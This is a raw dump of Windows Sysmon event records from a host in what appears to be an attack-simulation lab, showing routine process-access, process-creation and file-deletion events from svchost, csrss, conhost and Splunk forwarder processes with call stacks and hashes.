09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8ABE-6151-C179-00000000FD01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8ABE-6151-C179-00000000FD01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.496{69CF5F33-8ABE-6151-C179-00000000FD01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000978711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.261{69CF5F33-8ABD-6151-C079-00000000FD01}24162508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.089{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D45CFB8A67C0E313BC554AB766D0B5,SHA256=E720E091109AB8FB81A402C4F727CA61A5E168DB6B6DCD0657E5466F28DFE21C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8ABF-6151-C379-00000000FD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.839{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8ABF-6151-C379-00000000FD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.824{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8ABF-6151-C379-00000000FD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.824{69CF5F33-8ABF-6151-C379-00000000FD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000978740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8ABF-6151-C279-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 